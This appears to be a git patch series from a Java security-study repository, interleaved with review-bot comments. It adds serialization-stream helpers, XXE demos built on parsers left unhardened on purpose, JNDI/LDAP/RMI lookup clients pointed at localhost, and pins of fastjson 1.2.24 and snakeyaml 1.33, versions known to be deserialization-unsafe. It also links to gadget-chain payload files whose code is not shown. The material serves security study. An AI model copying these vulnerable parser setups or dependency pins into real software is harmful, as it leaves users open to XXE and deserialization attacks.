+ public static byte[] toBytes(Object[] objs) throws IOException {
+ ByteArrayOutputStream baos = new ByteArrayOutputStream();
+ DataOutputStream dos = new DataOutputStream(baos);
+ for (Object obj : objs) {
+ treatObject(dos, obj);
+ }
+ dos.close();
+ return baos.toByteArray();
+ }
+
+ public static void treatObject(DataOutputStream dos, Object obj)
+ throws IOException {
+ if (obj instanceof Byte) {
+ dos.writeByte((Byte) obj);
+ } else if (obj instanceof Short) {
+ dos.writeShort((Short) obj);
+ } else if (obj instanceof Integer) {
+ dos.writeInt((Integer) obj);
+ } else if (obj instanceof Long) {
+ dos.writeLong((Long) obj);
+ } else if (obj instanceof String) {
+ dos.writeUTF((String) obj);
+ } else {
+ ByteArrayOutputStream ba = new ByteArrayOutputStream();
+ ObjectOutputStream oos = new ObjectOutputStream(ba);
+ oos.writeObject(obj);
+ oos.close();
+ dos.write(ba.toByteArray(), 4, ba.size() - 4); // 4 = skip the header
+ }
+ }
+}
diff --git a/general/src/main/java/com/govuln/serialization/model/Card.java b/general/src/main/java/com/govuln/serialization/model/Card.java
new file mode 100644
index 0000000..f73fbfc
--- /dev/null
+++ b/general/src/main/java/com/govuln/serialization/model/Card.java
@@ -0,0 +1,12 @@
+package com.govuln.serialization.model;
+
+import java.io.Serializable;
+
+public class Card implements Serializable {
+ public Integer value;
+
+ public Card()
+ {
+ this.value = 100;
+ }
+}
diff --git a/general/src/main/java/com/govuln/serialization/model/User.java b/general/src/main/java/com/govuln/serialization/model/User.java
new file mode 100644
index 0000000..8707855
--- /dev/null
+++ b/general/src/main/java/com/govuln/serialization/model/User.java
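Review bot: `treatObject` has no branch for `byte[]`, so a raw byte array in `objs` falls into the `else` branch and is embedded as a serialized array object instead of being written verbatim; adding `} else if (obj instanceof byte[]) { dos.write((byte[]) obj);` before the fallback lets callers splice literal bytes into a hand-built stream. The fallback serializes each object in a fresh ObjectOutputStream and strips its 4-byte header, which looks like it means every embedded object gets its own handle numbering; if that is intended, `// each object is written by a fresh ObjectOutputStream, so back-reference handles restart per element` would make the limitation explicit. `dos.close()` in `toBytes` sits outside any finally; harmless for a ByteArrayOutputStream, but try-with-resources reads better now that the compiler plugin added in this commit sets 8.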
@@ -0,0 +1,15 @@ +package com.govuln.serialization.model; + +import java.io.Serializable; + +public class User implements Serializable { + protected String name; + protected Card card; + + public User() + { + this.name = "Bob"; + this.card = new Card(); + } + +} From 30881f4796a4278899371269bfdbc49888bfa2b9 Mon Sep 17 00:00:00 2001 From: phith0n Date: 2022年3月18日 01:58:36 +0800 Subject: [PATCH 07/10] add a new section --- README.md | 10 +++- general/general.iml | 19 -------- .../com/govuln/serialization/Application.java | 47 ------------------- .../serialization/UserSerialization.java | 24 ++++++++++ .../com/govuln/serialization/model/Card.java | 12 ----- .../com/govuln/serialization/model/User.java | 11 +++-- 6 files changed, 39 insertions(+), 84 deletions(-) delete mode 100644 general/general.iml delete mode 100644 general/src/main/java/com/govuln/serialization/Application.java create mode 100644 general/src/main/java/com/govuln/serialization/UserSerialization.java delete mode 100644 general/src/main/java/com/govuln/serialization/model/Card.java diff --git a/README.md b/README.md index cc8c809..d6a7031 100644 --- a/README.md +++ b/README.md @@ -23,6 +23,7 @@ - [Java安全漫谈 - 16.commons-collections4与漏洞修复](https://t.zsxq.com/ZBQj2FE) - [Java安全漫谈 - 17.CommonsBeanutils与无commons-collections的Shiro反序列化利用](https://t.zsxq.com/IqBmuF6) - [Java安全漫谈 - 18.原生反序列化利用链JDK7u21](https://t.zsxq.com/neMbuJa) +- [Java安全漫谈 - 19.Java反序列化协议构造与分析](https://t.zsxq.com/ZfiEeEY) ## Demo代码 
@@ -42,8 +43,8 @@ - 我简化的[CommonsCollections3](general/src/main/java/com/govuln/deserialization/CommonsCollections3.java) - CommonsCollections6一次执行多个命令:[CommonsCollections6Multiple](general/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java) - 支持commons-collections4.0版本的CommonsCollections6利用链:[CommonsCollections6For4](general/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java) -- 我简化的CommonsBeanutils1利用链:[CommonsBeanutils1](https://github.com/phith0n/JavaThings/blob/master/general/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java) -- 简化版Java原生利用链 [JDK7u21](https://github.com/phith0n/JavaThings/blob/master/general/src/main/java/com/govuln/deserialization/JDK7u21.java) +- 我简化的CommonsBeanutils1利用链:[CommonsBeanutils1](general/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java) +- 简化版Java原生利用链 [JDK7u21](general/src/main/java/com/govuln/deserialization/JDK7u21.java) Shiro反序列化: @@ -51,3 +52,8 @@ Shiro反序列化: - 使用CommonsCollections6与Shiro默认Key构造Payload:[Client0.java](shiroattack/src/main/java/com/govuln/shiroattack/Client0.java)、[CommonsCollections6.java](shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollections6.java),在Tomcat中可能会无法成功反序列化 - 使用CommonsCollections、TemplatesImpl与Shiro默认Key构造Payload:[Client.java](shiroattack/src/main/java/com/govuln/shiroattack/Client.java)、[CommonsCollectionsShiro.java](shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollectionsShiro.java),解决上述问题 - 使用Shiro默认自带的commons-beanutils构造的反序列化利用链:[CommonsBeanutils1Shiro.java](shiroattack/src/main/java/com/govuln/shiroattack/CommonsBeanutils1Shiro.java) + +自研反序列化分析工具: + +- zkar: +- 如何使用zkar修复SerialVersionUID不匹配的问题: diff --git a/general/general.iml b/general/general.iml deleted file mode 100644 index 7ee5fc5..0000000 --- a/general/general.iml +++ /dev/null @@ -1,19 +0,0 @@ - - - - - - - - - - - - - - - - - - - \ No newline at end of file 
diff --git a/general/src/main/java/com/govuln/serialization/Application.java b/general/src/main/java/com/govuln/serialization/Application.java deleted file mode 100644 index 65c0712..0000000 --- a/general/src/main/java/com/govuln/serialization/Application.java +++ /dev/null @@ -1,47 +0,0 @@ -package com.govuln.serialization; - -import com.govuln.serialization.model.User; -import org.apache.commons.codec.binary.Hex; -import org.apache.commons.io.IOUtils; -import static java.io.ObjectStreamConstants.*; - -import java.io.*; - -public class Application { - public static void main(String[] args) throws Exception - { - write(); - read(); - } - - public static void write() throws Exception - { - ByteArrayOutputStream byteSteam = new ByteArrayOutputStream(); - ObjectOutputStream oos = new ObjectOutputStream(byteSteam); - oos.writeObject(new User()); - - String data = Hex.encodeHexString(byteSteam.toByteArray()); - System.out.println(data); - ProcessBuilder builder = new ProcessBuilder( - "java", - "-jar", - "D:\\program\\SerializationDumper\\SerializationDumper-v1.13.jar", - data); - InputStream is = builder.start().getInputStream(); - IOUtils.copy(is, System.out); - } - - public static void read() throws Exception - { - Object[] data = { - STREAM_MAGIC, STREAM_VERSION, - TC_STRING, - "123123", - }; - byte[] bs = Converter.toBytes(data); - System.out.println(Hex.encodeHexString(bs)); - ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bs)); - Object obj = ois.readObject(); - System.out.println(obj); - } -} diff --git a/general/src/main/java/com/govuln/serialization/UserSerialization.java b/general/src/main/java/com/govuln/serialization/UserSerialization.java new file mode 100644 index 0000000..d20a7af --- /dev/null +++ b/general/src/main/java/com/govuln/serialization/UserSerialization.java 
@@ -0,0 +1,24 @@ +package com.govuln.serialization; + +import com.govuln.serialization.model.User; +import org.apache.commons.codec.binary.Base64; + +import java.io.*; + +public class UserSerialization { + public static void main(String[] args) throws Exception + { + write(); + } + + public static void write() throws Exception + { + User user = new User("Bob"); + user.setParent(new User("Josua")); + ByteArrayOutputStream byteSteam = new ByteArrayOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(byteSteam); + oos.writeObject(user); + + System.out.println(Base64.encodeBase64String(byteSteam.toByteArray())); + } +} diff --git a/general/src/main/java/com/govuln/serialization/model/Card.java b/general/src/main/java/com/govuln/serialization/model/Card.java deleted file mode 100644 index f73fbfc..0000000 --- a/general/src/main/java/com/govuln/serialization/model/Card.java +++ /dev/null @@ -1,12 +0,0 @@ -package com.govuln.serialization.model; - -import java.io.Serializable; - -public class Card implements Serializable { - public Integer value; - - public Card() - { - this.value = 100; - } -} diff --git a/general/src/main/java/com/govuln/serialization/model/User.java b/general/src/main/java/com/govuln/serialization/model/User.java index 8707855..bda5098 100644 --- a/general/src/main/java/com/govuln/serialization/model/User.java +++ b/general/src/main/java/com/govuln/serialization/model/User.java @@ -4,12 +4,15 @@ public class User implements Serializable { protected String name; - protected Card card; + protected User parent; - public User() + public User(String name) { - this.name = "Bob"; - this.card = new Card(); + this.name = name; } + public void setParent(User parent) + { + this.parent = parent; + } } From 35f83ede0b6ed40204fa699589e43a4b4cf3cae5 Mon Sep 17 00:00:00 2001 
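Review bot: `oos` is never flushed or closed after `oos.writeObject(user)` in `write()`, so the example leans on ObjectOutputStream's internal block-buffer drain for the bytes to be present when `byteSteam.toByteArray()` runs, and the stream itself is left open. Add `oos.close();` directly after the `writeObject` call, or wrap both streams in try-with-resources if the module's compiler level allows it. While there, the local is misspelled: `byteSteam` should read `byteStream`.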
From: phith0n Date: 2024年8月12日 16:40:30 +0800 Subject: [PATCH 08/10] added XXE related examples --- general/pom.xml | 6 ++-- .../govuln/xxe/DocumentBuilderExample.java | 18 ++++++++++++ .../java/com/govuln/xxe/SAXParserExample.java | 23 +++++++++++++++ .../java/com/govuln/xxe/XMLReaderExample.java | 22 +++++++++++++++ .../java/com/govuln/xxe/XMLStreamExample.java | 28 +++++++++++++++++++ .../govuln/xxe/XPathExpressionExample.java | 22 +++++++++++++++ 6 files changed, 115 insertions(+), 4 deletions(-) create mode 100644 general/src/main/java/com/govuln/xxe/DocumentBuilderExample.java create mode 100644 general/src/main/java/com/govuln/xxe/SAXParserExample.java create mode 100644 general/src/main/java/com/govuln/xxe/XMLReaderExample.java create mode 100644 general/src/main/java/com/govuln/xxe/XMLStreamExample.java create mode 100644 general/src/main/java/com/govuln/xxe/XPathExpressionExample.java diff --git a/general/pom.xml b/general/pom.xml index 97a028b..29d9524 100644 --- a/general/pom.xml +++ b/general/pom.xml @@ -14,8 +14,8 @@ UTF-8 - 1.6 - 1.6 + 8 + 8 @@ -54,8 +54,6 @@ commons-io 2.10.0 - - diff --git a/general/src/main/java/com/govuln/xxe/DocumentBuilderExample.java b/general/src/main/java/com/govuln/xxe/DocumentBuilderExample.java new file mode 100644 index 0000000..3111c38 --- /dev/null +++ b/general/src/main/java/com/govuln/xxe/DocumentBuilderExample.java @@ -0,0 +1,18 @@ +package com.govuln.xxe; + +import org.w3c.dom.Document; +import javax.xml.parsers.DocumentBuilder; +import javax.xml.parsers.DocumentBuilderFactory; +import java.io.ByteArrayInputStream; + +public class DocumentBuilderExample { + public static void main(String[] args) throws Exception { + String data = "\n" + + " ]>\n" + + "&xxe;"; + DocumentBuilder db = DocumentBuilderFactory.newInstance().newDocumentBuilder(); + Document doc = db.parse(new ByteArrayInputStream(data.getBytes())); + System.out.println(doc.getDocumentElement().getTextContent()); + } +} 
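Review bot: `DocumentBuilderFactory.newInstance().newDocumentBuilder()` is used with factory defaults, so the DOCTYPE that `data` evidently carries (its markup is stripped in this rendering) is processed and its entity resolved; that is presumably the point of the example, but nothing in the file says so, and the same applies to SAXParserExample, XMLReaderExample, XMLStreamExample and XPathExpressionExample in the following hunks. A one-line header comment would stop the snippet being copied as-is, e.g. `// Intentionally unhardened: a production parser sets "http://apache.org/xml/features/disallow-doctype-decl" to true (DocumentBuilderFactory/SAXParserFactory/XMLReader) or XMLInputFactory.SUPPORT_DTD to false (StAX).` Separately, `data.getBytes()` encodes with the platform default charset; `data.getBytes(StandardCharsets.UTF_8)` makes the parsed bytes independent of the JVM's file.encoding (same in SAXParserExample and XMLStreamExample).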
diff --git a/general/src/main/java/com/govuln/xxe/SAXParserExample.java b/general/src/main/java/com/govuln/xxe/SAXParserExample.java new file mode 100644 index 0000000..46fa054 --- /dev/null +++ b/general/src/main/java/com/govuln/xxe/SAXParserExample.java @@ -0,0 +1,23 @@ +package com.govuln.xxe; + +import org.xml.sax.helpers.DefaultHandler; + +import javax.xml.parsers.SAXParser; +import javax.xml.parsers.SAXParserFactory; +import java.io.ByteArrayInputStream; + +public class SAXParserExample { + public static void main(String[] args) throws Exception { + String data = "\n" + + " ]>\n" + + "&xxe;"; + SAXParser parser = SAXParserFactory.newInstance().newSAXParser(); + + parser.parse(new ByteArrayInputStream(data.getBytes()), new DefaultHandler() { + public void characters(char[] ch, int start, int length) { + System.out.print(new String(ch, start, length)); + } + }); + } +} diff --git a/general/src/main/java/com/govuln/xxe/XMLReaderExample.java b/general/src/main/java/com/govuln/xxe/XMLReaderExample.java new file mode 100644 index 0000000..459a222 --- /dev/null +++ b/general/src/main/java/com/govuln/xxe/XMLReaderExample.java @@ -0,0 +1,22 @@ +package com.govuln.xxe; + +import org.xml.sax.InputSource; +import org.xml.sax.XMLReader; +import org.xml.sax.helpers.DefaultHandler; +import org.xml.sax.helpers.XMLReaderFactory; + +public class XMLReaderExample { + public static void main(String[] args) throws Exception { + String data = "\n" + + " ]>\n" + + "&xxe;"; + XMLReader reader = XMLReaderFactory.createXMLReader(); + reader.setContentHandler(new DefaultHandler() { + public void characters(char[] ch, int start, int length) { + System.out.print(new String(ch, start, length)); + } + }); + reader.parse(new InputSource(data)); + } +} diff --git a/general/src/main/java/com/govuln/xxe/XMLStreamExample.java b/general/src/main/java/com/govuln/xxe/XMLStreamExample.java new file mode 100644 index 0000000..0173a44 --- /dev/null 
+++ b/general/src/main/java/com/govuln/xxe/XMLStreamExample.java @@ -0,0 +1,28 @@ +package com.govuln.xxe; + +import javax.xml.stream.XMLInputFactory; +import javax.xml.stream.XMLStreamReader; +import java.io.*; + +public class XMLStreamExample { + public static void main(String[] args) throws Exception { + String data = "\n" + + " ]>\n" + + "&xxe;"; + InputStream input = new ByteArrayInputStream(data.getBytes()); + XMLInputFactory factory = XMLInputFactory.newFactory(); + XMLStreamReader reader = factory.createXMLStreamReader(input); + + while (reader.hasNext()) { + reader.next(); + if (reader.isStartElement()) { + System.out.println("Start: " + reader.getLocalName()); + } else if (reader.isEndElement()) { + System.out.println("End: " + reader.getLocalName()); + } else if (reader.hasText()) { + System.out.println("Data: " + reader.getText().trim()); + } + } + } +} diff --git a/general/src/main/java/com/govuln/xxe/XPathExpressionExample.java b/general/src/main/java/com/govuln/xxe/XPathExpressionExample.java new file mode 100644 index 0000000..9b15047 --- /dev/null +++ b/general/src/main/java/com/govuln/xxe/XPathExpressionExample.java @@ -0,0 +1,22 @@ +package com.govuln.xxe; + +import org.xml.sax.InputSource; +import javax.xml.xpath.XPath; +import javax.xml.xpath.XPathExpression; +import javax.xml.xpath.XPathFactory; +import java.io.ByteArrayInputStream; + +public class XPathExpressionExample { + public static void main(String[] args) throws Exception { + String data = "\n" + + " ]>\n" + + "&xxe;"; + XPathFactory xPathFactory = XPathFactory.newInstance(); + XPath xpath = xPathFactory.newXPath(); + XPathExpression xPathExpr = xpath.compile("/foo/text()"); + + String result = xPathExpr.evaluate(new InputSource(data)); + System.out.println(result); + } +} From 569ed3eb6e3426ba3617228a0bda16d33e3bf354 Mon Sep 17 00:00:00 2001 
From: phith0n Date: Wed, 9 Apr 2025 19:57:08 +0800 Subject: [PATCH 09/10] rename folder name --- {general => jdk8}/bytecodes/Foo.java | 0 {general => jdk8}/bytecodes/Hello.java | 0 .../bytecodes/HelloTemplatesImpl.java | 0 {general => jdk8}/pom.xml | 29 +++++++++++++++++++ .../src/main/java/com/govuln/beans/Cat.java | 0 .../main/java/com/govuln/bytes/HelloBCEL.java | 0 .../com/govuln/bytes/HelloClassLoader.java | 0 .../com/govuln/bytes/HelloDefineClass.java | 0 .../com/govuln/bytes/HelloTemplatesImpl.java | 0 .../java/com/govuln/client/JNDIClient.java | 14 +++++++++ .../java/com/govuln/client/LDAPClient.java | 21 ++++++++++++++ .../java/com/govuln/client/RMIClient.java | 9 ++++++ .../deserialization/CommonsBeanutils1.java | 0 .../deserialization/CommonsCollections1.java | 0 .../CommonsCollections1For4.java | 0 .../deserialization/CommonsCollections2.java | 0 .../CommonsCollections2TemplatesImpl.java | 0 .../deserialization/CommonsCollections3.java | 0 .../CommonsCollections3For4.java | 0 .../deserialization/CommonsCollections6.java | 0 .../CommonsCollections6For4.java | 0 .../CommonsCollections6Multiple.java | 0 .../CommonsCollectionsIntro.java | 0 .../CommonsCollectionsIntro2.java | 0 .../CommonsCollectionsIntro3.java | 0 .../com/govuln/deserialization/JDK7u21.java | 0 .../TemplatesImplDeserialization.java | 0 .../com/govuln/deserialization/URLDNS.java | 0 jdk8/src/main/java/com/govuln/js/Eval.java | 20 +++++++++++++ .../com/govuln/serialization/Converter.java | 0 .../serialization/UserSerialization.java | 0 .../com/govuln/serialization/model/User.java | 0 .../govuln/xxe/DocumentBuilderExample.java | 0 .../java/com/govuln/xxe/SAXParserExample.java | 0 .../java/com/govuln/xxe/XMLReaderExample.java | 0 .../java/com/govuln/xxe/XMLStreamExample.java | 0 .../govuln/xxe/XPathExpressionExample.java | 0 .../src/main/java/evil/EvilTemplatesImpl.java | 0 .../src/main/java/evil/Hello.java | 0 jdk8/src/main/resources/eval.js | 4 +++ 40 files changed, 97 insertions(+) rename 
{general => jdk8}/bytecodes/Foo.java (100%) rename {general => jdk8}/bytecodes/Hello.java (100%) rename {general => jdk8}/bytecodes/HelloTemplatesImpl.java (100%) rename {general => jdk8}/pom.xml (81%) rename {general => jdk8}/src/main/java/com/govuln/beans/Cat.java (100%) rename {general => jdk8}/src/main/java/com/govuln/bytes/HelloBCEL.java (100%) rename {general => jdk8}/src/main/java/com/govuln/bytes/HelloClassLoader.java (100%) rename {general => jdk8}/src/main/java/com/govuln/bytes/HelloDefineClass.java (100%) rename {general => jdk8}/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java (100%) create mode 100644 jdk8/src/main/java/com/govuln/client/JNDIClient.java create mode 100644 jdk8/src/main/java/com/govuln/client/LDAPClient.java create mode 100644 jdk8/src/main/java/com/govuln/client/RMIClient.java rename {general => jdk8}/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java (100%) rename {general => jdk8}/src/main/java/com/govuln/deserialization/CommonsCollections1.java (100%) rename {general => jdk8}/src/main/java/com/govuln/deserialization/CommonsCollections1For4.java (100%) rename {general => jdk8}/src/main/java/com/govuln/deserialization/CommonsCollections2.java (100%) rename {general => jdk8}/src/main/java/com/govuln/deserialization/CommonsCollections2TemplatesImpl.java (100%) rename {general => jdk8}/src/main/java/com/govuln/deserialization/CommonsCollections3.java (100%) rename {general => jdk8}/src/main/java/com/govuln/deserialization/CommonsCollections3For4.java (100%) rename {general => jdk8}/src/main/java/com/govuln/deserialization/CommonsCollections6.java (100%) rename {general => jdk8}/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java (100%) rename {general => jdk8}/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java (100%) rename {general => jdk8}/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro.java (100%) rename {general => 
jdk8}/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java (100%) rename {general => jdk8}/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java (100%) rename {general => jdk8}/src/main/java/com/govuln/deserialization/JDK7u21.java (100%) rename {general => jdk8}/src/main/java/com/govuln/deserialization/TemplatesImplDeserialization.java (100%) rename {general => jdk8}/src/main/java/com/govuln/deserialization/URLDNS.java (100%) create mode 100644 jdk8/src/main/java/com/govuln/js/Eval.java rename {general => jdk8}/src/main/java/com/govuln/serialization/Converter.java (100%) rename {general => jdk8}/src/main/java/com/govuln/serialization/UserSerialization.java (100%) rename {general => jdk8}/src/main/java/com/govuln/serialization/model/User.java (100%) rename {general => jdk8}/src/main/java/com/govuln/xxe/DocumentBuilderExample.java (100%) rename {general => jdk8}/src/main/java/com/govuln/xxe/SAXParserExample.java (100%) rename {general => jdk8}/src/main/java/com/govuln/xxe/XMLReaderExample.java (100%) rename {general => jdk8}/src/main/java/com/govuln/xxe/XMLStreamExample.java (100%) rename {general => jdk8}/src/main/java/com/govuln/xxe/XPathExpressionExample.java (100%) rename {general => jdk8}/src/main/java/evil/EvilTemplatesImpl.java (100%) rename {general => jdk8}/src/main/java/evil/Hello.java (100%) create mode 100644 jdk8/src/main/resources/eval.js diff --git a/general/bytecodes/Foo.java b/jdk8/bytecodes/Foo.java similarity index 100% rename from general/bytecodes/Foo.java rename to jdk8/bytecodes/Foo.java diff --git a/general/bytecodes/Hello.java b/jdk8/bytecodes/Hello.java similarity index 100% rename from general/bytecodes/Hello.java rename to jdk8/bytecodes/Hello.java diff --git a/general/bytecodes/HelloTemplatesImpl.java b/jdk8/bytecodes/HelloTemplatesImpl.java similarity index 100% rename from general/bytecodes/HelloTemplatesImpl.java rename to jdk8/bytecodes/HelloTemplatesImpl.java 
diff --git a/general/pom.xml b/jdk8/pom.xml similarity index 81% rename from general/pom.xml rename to jdk8/pom.xml index 29d9524..fb1091e 100644 --- a/general/pom.xml +++ b/jdk8/pom.xml @@ -54,6 +54,35 @@ commons-io 2.10.0 + + + + org.springframework.boot + spring-boot-starter-web + 2.7.18 + + + + + org.yaml + snakeyaml + 1.33 + + + + + com.alibaba + fastjson + 1.2.24 + + + + + org.apache.bcel + bcel + 6.10.0 + + diff --git a/general/src/main/java/com/govuln/beans/Cat.java b/jdk8/src/main/java/com/govuln/beans/Cat.java similarity index 100% rename from general/src/main/java/com/govuln/beans/Cat.java rename to jdk8/src/main/java/com/govuln/beans/Cat.java diff --git a/general/src/main/java/com/govuln/bytes/HelloBCEL.java b/jdk8/src/main/java/com/govuln/bytes/HelloBCEL.java similarity index 100% rename from general/src/main/java/com/govuln/bytes/HelloBCEL.java rename to jdk8/src/main/java/com/govuln/bytes/HelloBCEL.java diff --git a/general/src/main/java/com/govuln/bytes/HelloClassLoader.java b/jdk8/src/main/java/com/govuln/bytes/HelloClassLoader.java similarity index 100% rename from general/src/main/java/com/govuln/bytes/HelloClassLoader.java rename to jdk8/src/main/java/com/govuln/bytes/HelloClassLoader.java diff --git a/general/src/main/java/com/govuln/bytes/HelloDefineClass.java b/jdk8/src/main/java/com/govuln/bytes/HelloDefineClass.java similarity index 100% rename from general/src/main/java/com/govuln/bytes/HelloDefineClass.java rename to jdk8/src/main/java/com/govuln/bytes/HelloDefineClass.java diff --git a/general/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java b/jdk8/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java similarity index 100% rename from general/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java rename to jdk8/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java diff --git a/jdk8/src/main/java/com/govuln/client/JNDIClient.java b/jdk8/src/main/java/com/govuln/client/JNDIClient.java new file mode 100644 index 0000000..f045cb4 
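Review bot: The four dependencies added to `jdk8/pom.xml` are pinned to old releases — `fastjson` 1.2.24 and `snakeyaml` 1.33 in particular are versions widely documented as instantiating attacker-chosen types during deserialization by default, and `spring-boot-starter-web` 2.7.18 belongs to an end-of-life line. Presumably that is deliberate for the demos in this module, but nothing in the hunk records it, and with the markup stripped in this rendering I cannot see whether a comment exists. An XML comment above the block, `<!-- intentionally old versions: targets for the demos in this module, do not copy into a real build -->`, would make the intent explicit.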
--- /dev/null
+++ b/jdk8/src/main/java/com/govuln/client/JNDIClient.java
@@ -0,0 +1,14 @@
+package com.govuln.client;
+
+import javax.naming.Context;
+import javax.naming.InitialContext;
+import javax.naming.directory.InitialDirContext;
+import javax.naming.ldap.InitialLdapContext;
+import java.util.Hashtable;
+
+public class JNDIClient {
+ public static void main(String[] args) throws Exception {
+ Context initialContext = new InitialContext();
+ initialContext.lookup("ldap://127.0.0.1:389/sample");
+ }
+}
diff --git a/jdk8/src/main/java/com/govuln/client/LDAPClient.java b/jdk8/src/main/java/com/govuln/client/LDAPClient.java
new file mode 100644
index 0000000..8f68ba1
--- /dev/null
+++ b/jdk8/src/main/java/com/govuln/client/LDAPClient.java
@@ -0,0 +1,21 @@
+package com.govuln.client;
+
+import javax.naming.Context;
+import javax.naming.InitialContext;
+import javax.naming.NamingException;
+import javax.naming.directory.InitialDirContext;
+import java.util.Hashtable;
+
+public class LDAPClient {
+ public static void main(String[] args) throws NamingException {
+ Hashtable env = new Hashtable();
+ env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.ldap.LdapCtxFactory");
+ env.put(Context.SECURITY_AUTHENTICATION, "simple");
+ env.put(Context.SECURITY_PRINCIPAL, "user");
+ env.put(Context.SECURITY_CREDENTIALS, "password");
+ env.put(Context.PROVIDER_URL, "ldap://127.0.0.1:389");
+ InitialContext ctx = new InitialDirContext(env);
+ ctx.lookup("sample");
+ ctx.close();
+ }
+}
diff --git a/jdk8/src/main/java/com/govuln/client/RMIClient.java b/jdk8/src/main/java/com/govuln/client/RMIClient.java
new file mode 100644
index 0000000..00c6ef2
--- /dev/null
+++ b/jdk8/src/main/java/com/govuln/client/RMIClient.java
@@ -0,0 +1,9 @@
+package com.govuln.client;
+
+import java.rmi.Naming;
+
+public class RMIClient {
+ public static void main(String[] args) throws Exception {
+ Naming.lookup("rmi://localhost:1099/test");
+ }
+}
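Review bot: `JNDIClient` imports `InitialDirContext`, `InitialLdapContext` and `Hashtable` but uses none of them; only `Context` and `InitialContext` are referenced in `main`. In `LDAPClient`, `ctx.close()` is skipped whenever `ctx.lookup("sample")` throws `NamingException`, so move the close into a `finally` block, and declare the environment as `Hashtable<String, String> env = new Hashtable<String, String>();` instead of the raw type. The literal `user`/`password` credentials are evidently placeholders for a local test server; a short comment saying so keeps them from being mistaken for real configuration.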
diff --git a/general/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections1.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections1.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/CommonsCollections1.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollections1.java diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections1For4.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections1For4.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/CommonsCollections1For4.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollections1For4.java diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections2.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections2.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/CommonsCollections2.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollections2.java diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections2TemplatesImpl.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections2TemplatesImpl.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/CommonsCollections2TemplatesImpl.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollections2TemplatesImpl.java 
diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections3.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections3.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/CommonsCollections3.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollections3.java diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections3For4.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections3For4.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/CommonsCollections3For4.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollections3For4.java diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections6.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/CommonsCollections6.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6.java diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java 
diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro.java diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java diff --git a/general/src/main/java/com/govuln/deserialization/JDK7u21.java b/jdk8/src/main/java/com/govuln/deserialization/JDK7u21.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/JDK7u21.java rename to 